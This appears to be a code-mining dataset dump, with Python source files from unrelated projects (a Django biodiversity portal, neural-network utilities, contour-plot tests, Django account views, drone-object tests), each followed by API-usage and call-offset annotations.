'dataset_list': query.order_by(F('pub_date').desc(nulls_last=True)).all(),
'env': settings.ENV
}
return render(request, 'data-stats.html', context)
def common_name_checker(request):
global results
if request.method == 'GET':
q = request.GET.get('q', '')
sep = request.GET.get('sep', '')
context = {
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
elif request.method == 'POST':
q = request.POST.get('q', '')
sep = request.POST.get('sep', 'n')
if not q:
context = {
'message': {
'head': '่ผธๅ
ฅ้ฏ่ชค',
'content': '่ซ่ผธๅ
ฅไธญๆๅ',
}
}
return render(request, 'tools-common_name_checker.html', context)
if q in ['ๅฐ็ฃ', '่บ็ฃ']:
context = {
'message': {
'head': '็ตๆๅคชๅค',
'content': '่ซ่ผธๅ
ฅๆดๅฎๆดไธญๆๅ',
},
'sep': sep,
'q': q,
}
return render(request, 'tools-common_name_checker.html', context)
if not sep:
sep = 'n'
results = []
if sep not in [',', 'n']:
return HttpResponseNotFound('err input')
sep_real = '\n' if sep == 'n' else sep
cname_list = q.split(sep_real)
cname_list = list(set(cname_list))
#taiwan_char_check_exclude = ['ๅฐ็ฃ็้ณฅ', 'ๅฐ็ฃ้ๅข', 'ๅฐ็ฃไบ็จฎ', 'ๅฐ็ฃ็นๆไบ็จฎ']
for cn in cname_list:
cn = cn.strip()
q_replace = ''
if 'ๅฐ็ฃ' in cn:
q_replace = cn.replace('ๅฐ็ฃ', '่บ็ฃ')
if '่บ็ฃ' in cn:
q_replace = cn.replace('่บ็ฃ', 'ๅฐ็ฃ')
row = {
'common_name': cn,
'match_type': 'no match',
'match_list': []
}
taxa = Taxon.objects.filter(rank='species')
if q_replace:
row['q_replace'] = q_replace
taxa = Taxon.objects.filter(Q(name_zh__icontains=cn) | Q(name_zh__icontains=q_replace)).all()
else:
taxa = Taxon.objects.filter(name_zh__icontains=cn).all()
if taxa:
row['match_type'] = 'match'
for t in taxa:
row['match_list'].append(t)
results.append(row)
context = {
'results': results,
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
def export_csv(request):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="users.csv"'
response.write(codecs.BOM_UTF8)
writer = csv.writer(response)
for row in results:
writer.writerow(row['match_list'])
return response
def trans(request):
translate_str = _("้่ฃกๆพ้่ฆ็ฟป่ญฏ็ๆๅญ")
context = {"translate_str": translate_str}
return render(request, 'index.html', context)
@require_GET
def robots_txt(request):
if os.environ.get('ENV')=='prod':
lines = [
"User-Agent: *",
"Disallow: /admin/",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
else:
lines = [
"User-Agent: *",
"Disallow: /",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
## Kuan-Yu added for API occurence record
def test(request):
Yearquery = SimpleData.objects \
.filter(scientific_name='Rana latouchii') \
.values('scientific_name', 'vernacular_name', 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-count')
year_rows = [{
'key': x['scientific_name'],
'label': x['vernacular_name'],
'year': x['year'],
'count': x['count']
} for x in Yearquery]
context = {
'occurrence_list': year_rows,
}
return render(request, 'test.html', context)
###example
filt1 = 'speices'
filt2 = 'database'
pk1 = '<NAME>'
pk2 = 'manager_17_15'
pk3 = '<NAME>'
pk4 = 'e10100001_4_10'
def ChartYear(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_year = species.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in sp_year
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_year = dataset.values( 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_year
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_year), content_type="application/json")
def ChartMonth(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_month = species.values( 'month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in sp_month
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_month = dataset.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_month
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_month), content_type="application/json")
|
[
"csv.writer",
"django.http.HttpResponse",
"apps.article.models.Article.objects.filter",
"json.dumps",
"django.db.models.Q",
"apps.data.helpers.stats.get_home_stats",
"os.environ.get",
"django.http.HttpResponseNotFound",
"django.db.models.F",
"apps.data.models.SimpleData.objects.filter",
"apps.data.models.Taxon.objects.filter",
"django.shortcuts.render",
"django.utils.translation.ugettext",
"django.db.models.Count",
"utils.mail.taibif_mail_contact_us"
] |
[((1275, 1313), 'django.shortcuts.render', 'render', (['request', '"""index.html"""', 'context'], {}), "(request, 'index.html', context)\n", (1281, 1313), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1356, 1395), 'django.shortcuts.render', 'render', (['request', '"""publishing-data.html"""'], {}), "(request, 'publishing-data.html')\n", (1362, 1395), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1547, 1579), 'django.shortcuts.render', 'render', (['request', '"""cookbook.html"""'], {}), "(request, 'cookbook.html')\n", (1553, 1579), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1624, 1665), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-1.html"""'], {}), "(request, 'cookbook-detail-1.html')\n", (1630, 1665), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1710, 1751), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-2.html"""'], {}), "(request, 'cookbook-detail-2.html')\n", (1716, 1751), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1796, 1837), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-3.html"""'], {}), "(request, 'cookbook-detail-3.html')\n", (1802, 1837), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1870, 1899), 'django.shortcuts.render', 'render', (['request', '"""tools.html"""'], {}), "(request, 'tools.html')\n", (1876, 1899), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2503, 2532), 'django.shortcuts.render', 'render', (['request', '"""plans.html"""'], {}), "(request, 'plans.html')\n", (2509, 2532), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2674, 2710), 'django.shortcuts.render', 'render', (['request', '"""about-taibif.html"""'], {}), "(request, 'about-taibif.html')\n", (2680, 2710), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2748, 2782), 'django.shortcuts.render', 'render', (['request', '"""about-gbif.html"""'], {}), "(request, 'about-gbif.html')\n", (2754, 2782), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2819, 2852), 'django.shortcuts.render', 'render', (['request', '"""open-data.html"""'], {}), "(request, 'open-data.html')\n", (2825, 2852), False, 'from django.shortcuts import render, get_object_or_404\n'), ((3190, 3233), 'django.shortcuts.render', 'render', (['request', '"""data-stats.html"""', 'context'], {}), "(request, 'data-stats.html', context)\n", (3196, 3233), False, 'from django.shortcuts import render, get_object_or_404\n'), ((5606, 5664), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (5612, 5664), False, 'from django.shortcuts import render, get_object_or_404\n'), ((5708, 5745), 'django.http.HttpResponse', 'HttpResponse', ([], {'content_type': '"""text/csv"""'}), "(content_type='text/csv')\n", (5720, 5745), False, 'from django.http import HttpResponse, HttpResponseNotFound\n'), ((5869, 5889), 'csv.writer', 'csv.writer', (['response'], {}), '(response)\n', (5879, 5889), False, 'import csv\n'), ((6031, 6046), 'django.utils.translation.ugettext', '_', (['"""้่ฃกๆพ้่ฆ็ฟป่ญฏ็ๆๅญ"""'], {}), "('้่ฃกๆพ้่ฆ็ฟป่ญฏ็ๆๅญ')\n", (6032, 6046), True, 'from django.utils.translation import ugettext as _\n'), ((6105, 6143), 'django.shortcuts.render', 'render', (['request', '"""index.html"""', 'context'], {}), "(request, 'index.html', context)\n", (6111, 6143), False, 'from django.shortcuts import render, get_object_or_404\n'), ((7141, 7178), 'django.shortcuts.render', 'render', (['request', '"""test.html"""', 'context'], {}), "(request, 'test.html', context)\n", (7147, 7178), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1239, 1255), 'apps.data.helpers.stats.get_home_stats', 'get_home_stats', ([], {}), '()\n', (1253, 1255), False, 'from apps.data.helpers.stats import get_home_stats\n'), ((1973, 2007), 'django.shortcuts.render', 'render', (['request', '"""contact-us.html"""'], {}), "(request, 'contact-us.html')\n", (1979, 2007), False, 'from django.shortcuts import render, get_object_or_404\n'), ((3487, 3545), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (3493, 3545), False, 'from django.shortcuts import render, get_object_or_404\n'), ((6191, 6212), 'os.environ.get', 'os.environ.get', (['"""ENV"""'], {}), "('ENV')\n", (6205, 6212), False, 'import os\n'), ((9335, 9357), 'json.dumps', 'json.dumps', (['chart_year'], {}), '(chart_year)\n', (9345, 9357), False, 'import json\n'), ((11454, 11477), 'json.dumps', 'json.dumps', (['chart_month'], {}), '(chart_month)\n', (11464, 11477), False, 'import json\n'), ((2295, 2323), 'utils.mail.taibif_mail_contact_us', 'taibif_mail_contact_us', (['data'], {}), '(data)\n', (2317, 2323), False, 'from utils.mail import taibif_mail_contact_us\n'), ((2427, 2470), 'django.shortcuts.render', 'render', (['request', '"""contact-us.html"""', 'context'], {}), "(request, 'contact-us.html', context)\n", (2433, 2470), False, 'from django.shortcuts import render, get_object_or_404\n'), ((690, 729), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""NEWS"""'}), "(category='NEWS')\n", (712, 729), False, 'from apps.article.models import Article\n'), ((758, 798), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""EVENT"""'}), "(category='EVENT')\n", (780, 798), False, 'from apps.article.models import Article\n'), ((828, 869), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""UPDATE"""'}), "(category='UPDATE')\n", (850, 869), False, 'from apps.article.models import Article\n'), ((3862, 3920), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (3868, 3920), False, 'from django.shortcuts import render, get_object_or_404\n'), ((4189, 4247), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (4195, 4247), False, 'from django.shortcuts import render, get_object_or_404\n'), ((4365, 4398), 'django.http.HttpResponseNotFound', 'HttpResponseNotFound', (['"""err input"""'], {}), "('err input')\n", (4385, 4398), False, 'from django.http import HttpResponse, HttpResponseNotFound\n'), ((5009, 5045), 'apps.data.models.Taxon.objects.filter', 'Taxon.objects.filter', ([], {'rank': '"""species"""'}), "(rank='species')\n", (5029, 5045), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n'), ((7399, 7421), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (7400, 7421), False, 'from django.db.models import Q, F, Count, Sum\n'), ((7424, 7446), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (7425, 7446), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8017, 8043), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (8018, 8043), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8046, 8072), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (8047, 8072), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8739, 8765), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (8740, 8765), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8768, 8794), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (8769, 8794), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9487, 9509), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (9488, 9509), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9512, 9534), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (9513, 9534), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10118, 10144), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (10119, 10144), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10147, 10173), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (10148, 10173), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10850, 10876), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (10851, 10876), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10879, 10905), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (10880, 10905), False, 'from django.db.models import Q, F, Count, Sum\n'), ((6837, 6850), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (6842, 6850), False, 'from django.db.models import Q, F, Count, Sum\n'), ((1002, 1042), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'is_homepage': '(True)'}), '(is_homepage=True)\n', (1024, 1042), False, 'from apps.article.models import Article\n'), ((7561, 7574), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (7566, 7574), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8190, 8203), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (8195, 8203), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8668, 8690), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (8669, 8690), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8693, 8715), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (8694, 8715), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8916, 8929), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (8921, 8929), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9653, 9667), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (9658, 9667), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10294, 10308), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (10299, 10308), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10779, 10801), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (10780, 10801), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10804, 10826), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (10805, 10826), False, 'from django.db.models import Q, F, Count, Sum\n'), ((11029, 11043), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (11034, 11043), False, 'from django.db.models import Q, F, Count, Sum\n'), ((3101, 3114), 'django.db.models.F', 'F', (['"""pub_date"""'], {}), "('pub_date')\n", (3102, 3114), False, 'from django.db.models import Q, F, Count, Sum\n'), ((5268, 5311), 'apps.data.models.Taxon.objects.filter', 'Taxon.objects.filter', ([], {'name_zh__icontains': 'cn'}), '(name_zh__icontains=cn)\n', (5288, 5311), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n'), ((5161, 5185), 'django.db.models.Q', 'Q', ([], {'name_zh__icontains': 'cn'}), '(name_zh__icontains=cn)\n', (5162, 5185), False, 'from django.db.models import Q, F, Count, Sum\n'), ((5188, 5219), 'django.db.models.Q', 'Q', ([], {'name_zh__icontains': 'q_replace'}), '(name_zh__icontains=q_replace)\n', (5189, 5219), False, 'from django.db.models import Q, F, Count, Sum\n'), ((6638, 6697), 'apps.data.models.SimpleData.objects.filter', 'SimpleData.objects.filter', ([], {'scientific_name': '"""Rana latouchii"""'}), "(scientific_name='Rana latouchii')\n", (6663, 6697), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n')]
|
# -*- coding: utf-8 -*-
from django.http import Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed
from django.shortcuts import redirect
from django.contrib import messages
from bundestagger.helper.utils import is_post
from bundestagger.account.auth import logged_in
from bundestagger.account.models import User
@is_post
def logout(request):
from bundestagger.account.auth import logout as logout_func
logout_func(request)
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
@is_post
@logged_in
def change_username(request):
if "username" in request.POST:
user = request.bundesuser
username = request.POST["username"]
if username != user.username:
if len(username)>20:
messages.add_message(request, messages.INFO, u"Username ist zu lang")
elif len(username)==0:
messages.add_message(request, messages.INFO, u"Username ist zu kurz")
else:
uc = User.objects.filter(username=username).count()
if uc == 0:
user.username = request.POST["username"]
user.save()
request.session["bundesuser"] = user
messages.add_message(request, messages.INFO, u"Username geรคndert")
else:
messages.add_message(request, messages.INFO, u"Username ist schon vergeben")
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
|
[
"django.shortcuts.redirect",
"bundestagger.account.auth.logout",
"bundestagger.account.models.User.objects.filter",
"django.contrib.messages.add_message"
] |
[((440, 460), 'bundestagger.account.auth.logout', 'logout_func', (['request'], {}), '(request)\n', (451, 460), True, 'from bundestagger.account.auth import logout as logout_func\n'), ((554, 568), 'django.shortcuts.redirect', 'redirect', (['next'], {}), '(next)\n', (562, 568), False, 'from django.shortcuts import redirect\n'), ((1578, 1592), 'django.shortcuts.redirect', 'redirect', (['next'], {}), '(next)\n', (1586, 1592), False, 'from django.shortcuts import redirect\n'), ((824, 893), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist zu lang"""'], {}), "(request, messages.INFO, u'Username ist zu lang')\n", (844, 893), False, 'from django.contrib import messages\n'), ((945, 1014), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist zu kurz"""'], {}), "(request, messages.INFO, u'Username ist zu kurz')\n", (965, 1014), False, 'from django.contrib import messages\n'), ((1299, 1365), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username geรคndert"""'], {}), "(request, messages.INFO, u'Username geรคndert')\n", (1319, 1365), False, 'from django.contrib import messages\n'), ((1408, 1484), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist schon vergeben"""'], {}), "(request, messages.INFO, u'Username ist schon vergeben')\n", (1428, 1484), False, 'from django.contrib import messages\n'), ((1054, 1092), 'bundestagger.account.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'username'}), '(username=username)\n', (1073, 1092), False, 'from bundestagger.account.models import User\n')]
|
"""Utility functions for neural networks."""
import numpy as np
import torch
def detach(states):
"""Truncate backpropagation (usually used in RNN)."""
return [state.detach() for state in states]
def hasnan(m):
"""Check if torch.tensor m have NaNs in it."""
return np.any(np.isnan(m.cpu().data.numpy()))
def printnn(model):
"""Print out neural network."""
for name, param in model.named_parameters():
if param.requires_grad:
print("{}[{}]\n{}".format('-' * 30, name, param.data.numpy()))
def numparams(model):
"""Calculate the total number of learnable parameters."""
return sum(p.numel() for p in model.parameters())
class UnpackedSequence(object):
"""Unpack a PackedSequence to original (unpadded) examples."""
def __init__(self, ps):
"""Construct an unpacked sequence object."""
self.packed_sequence = ps
lencnt = [int(n) for n in ps.batch_sizes[:-1]-ps.batch_sizes[1:]] \
+ [int(ps.batch_sizes[-1])]
self.seqlengths = [] # seqlengths[i] contains length of example i
for num, ll in zip(lencnt[::-1], range(len(lencnt), 0, -1)):
self.seqlengths.extend([ll] * num)
assert len(self.seqlengths) == self.packed_sequence.batch_sizes[0]
def __len__(self):
"""Return number of examples in this batch."""
return len(self.seqlengths)
def __getitem__(self, i):
"""Get original idx-th item in the batch."""
idx = torch.LongTensor(self.seqlengths[i])
idx[0] = i
idx[1:] = self.packed_sequence.batch_sizes[:self.seqlengths[i]-1]
ei = self.packed_sequence.data[idx.cumsum(0)] # example i
return ei
|
[
"torch.LongTensor"
] |
[((1488, 1524), 'torch.LongTensor', 'torch.LongTensor', (['self.seqlengths[i]'], {}), '(self.seqlengths[i])\n', (1504, 1524), False, 'import torch\n')]
|
from image_comparison import compare_images
import pytest
import util_config
import util_test
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_filled(name):
config = util_config.ConfigFilled(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_filled_quad_as_tri(name):
config = util_config.ConfigFilled(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_filled_corner(name):
config = util_config.ConfigFilledCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_corner.png", name)
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_lines(name):
if name == "mpl2005":
pytest.skip() # Line directions are not consistent.
config = util_config.ConfigLines(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_lines_quad_as_tri(name):
config = util_config.ConfigLines(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_lines_corner(name):
config = util_config.ConfigLinesCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_corner.png", name)
|
[
"util_config.ConfigFilledCorner",
"util_test.all_names",
"util_test.quad_as_tri_names",
"pytest.skip",
"util_config.ConfigLines",
"util_config.ConfigLinesCorner",
"image_comparison.compare_images",
"util_test.corner_mask_names",
"util_config.ConfigFilled"
] |
[((195, 225), 'util_config.ConfigFilled', 'util_config.ConfigFilled', (['name'], {}), '(name)\n', (219, 225), False, 'import util_config\n'), ((273, 328), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled.png"""', 'name'], {}), "(image_buffer, 'config_filled.png', name)\n", (287, 328), False, 'from image_comparison import compare_images\n'), ((129, 150), 'util_test.all_names', 'util_test.all_names', ([], {}), '()\n', (148, 150), False, 'import util_test\n'), ((450, 498), 'util_config.ConfigFilled', 'util_config.ConfigFilled', (['name'], {'quad_as_tri': '(True)'}), '(name, quad_as_tri=True)\n', (474, 498), False, 'import util_config\n'), ((546, 613), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled_quad_as_tri.png"""', 'name'], {}), "(image_buffer, 'config_filled_quad_as_tri.png', name)\n", (560, 613), False, 'from image_comparison import compare_images\n'), ((364, 393), 'util_test.quad_as_tri_names', 'util_test.quad_as_tri_names', ([], {}), '()\n', (391, 393), False, 'import util_test\n'), ((730, 766), 'util_config.ConfigFilledCorner', 'util_config.ConfigFilledCorner', (['name'], {}), '(name)\n', (760, 766), False, 'import util_config\n'), ((814, 876), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled_corner.png"""', 'name'], {}), "(image_buffer, 'config_filled_corner.png', name)\n", (828, 876), False, 'from image_comparison import compare_images\n'), ((649, 678), 'util_test.corner_mask_names', 'util_test.corner_mask_names', ([], {}), '()\n', (676, 678), False, 'import util_test\n'), ((1064, 1093), 'util_config.ConfigLines', 'util_config.ConfigLines', (['name'], {}), '(name)\n', (1087, 1093), False, 'import util_config\n'), ((1141, 1195), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines.png"""', 'name'], {}), "(image_buffer, 'config_lines.png', name)\n", (1155, 1195), False, 'from image_comparison import compare_images\n'), ((912, 933), 'util_test.all_names', 'util_test.all_names', ([], {}), '()\n', (931, 933), False, 'import util_test\n'), ((1316, 1363), 'util_config.ConfigLines', 'util_config.ConfigLines', (['name'], {'quad_as_tri': '(True)'}), '(name, quad_as_tri=True)\n', (1339, 1363), False, 'import util_config\n'), ((1411, 1477), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines_quad_as_tri.png"""', 'name'], {}), "(image_buffer, 'config_lines_quad_as_tri.png', name)\n", (1425, 1477), False, 'from image_comparison import compare_images\n'), ((1231, 1260), 'util_test.quad_as_tri_names', 'util_test.quad_as_tri_names', ([], {}), '()\n', (1258, 1260), False, 'import util_test\n'), ((1593, 1628), 'util_config.ConfigLinesCorner', 'util_config.ConfigLinesCorner', (['name'], {}), '(name)\n', (1622, 1628), False, 'import util_config\n'), ((1676, 1737), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines_corner.png"""', 'name'], {}), "(image_buffer, 'config_lines_corner.png', name)\n", (1690, 1737), False, 'from image_comparison import compare_images\n'), ((1513, 1542), 'util_test.corner_mask_names', 'util_test.corner_mask_names', ([], {}), '()\n', (1540, 1542), False, 'import util_test\n'), ((998, 1011), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (1009, 1011), False, 'import pytest\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2018 <NAME>
# Distributed under the terms of the Apache License 2.0
"""
Test Aerial Objects
#####################
"""
import six
import json
import uuid
import numpy as np
from itertools import cycle
from dronedirector.aerial import AerialObject, Drone, SinusoidalDrone
class CaliRedwood(AerialObject):
"""Example of subclassing."""
def __init__(self):
super(CaliRedwood, self).__init__(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
def test_simple_aerial():
"""Test making a simple object on-the-fly."""
tree = AerialObject(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
msg = tree.message()
assert isinstance(msg, six.string_types)
assert isinstance(json.loads(msg), dict)
def test_subclassing_ao():
"""Test subclassing :class:`~dronedirector.aerial.AerialObject`."""
tree = CaliRedwood()
msg = json.loads(tree.message()) # Tests for valid json
assert isinstance(msg, dict)
assert np.isclose(msg['altitude'], 100.0)
def test_drone():
"""Test basic drone creation."""
uid = uuid.uuid4()
drone = Drone(cycle([1000.0]), cycle([41.0]), region="New York", uid=uid,
longitude=cycle(np.sin(np.arange(0, 2*np.pi, np.pi/360))))
assert drone.region == "New York"
assert drone.uid == uid
msg = json.loads(drone.message())
assert len(msg) == 6
|
[
"uuid.uuid4",
"json.loads",
"numpy.isclose",
"numpy.arange",
"itertools.cycle"
] |
[((1186, 1220), 'numpy.isclose', 'np.isclose', (["msg['altitude']", '(100.0)'], {}), "(msg['altitude'], 100.0)\n", (1196, 1220), True, 'import numpy as np\n'), ((1288, 1300), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1298, 1300), False, 'import uuid\n'), ((930, 945), 'json.loads', 'json.loads', (['msg'], {}), '(msg)\n', (940, 945), False, 'import json\n'), ((1319, 1334), 'itertools.cycle', 'cycle', (['[1000.0]'], {}), '([1000.0])\n', (1324, 1334), False, 'from itertools import cycle\n'), ((1336, 1349), 'itertools.cycle', 'cycle', (['[41.0]'], {}), '([41.0])\n', (1341, 1349), False, 'from itertools import cycle\n'), ((717, 731), 'itertools.cycle', 'cycle', (['[100.0]'], {}), '([100.0])\n', (722, 731), False, 'from itertools import cycle\n'), ((766, 782), 'itertools.cycle', 'cycle', (['[37.8716]'], {}), '([37.8716])\n', (771, 782), False, 'from itertools import cycle\n'), ((818, 836), 'itertools.cycle', 'cycle', (['[-122.2727]'], {}), '([-122.2727])\n', (823, 836), False, 'from itertools import cycle\n'), ((450, 464), 'itertools.cycle', 'cycle', (['[100.0]'], {}), '([100.0])\n', (455, 464), False, 'from itertools import cycle\n'), ((517, 533), 'itertools.cycle', 'cycle', (['[37.8716]'], {}), '([37.8716])\n', (522, 533), False, 'from itertools import cycle\n'), ((587, 605), 'itertools.cycle', 'cycle', (['[-122.2727]'], {}), 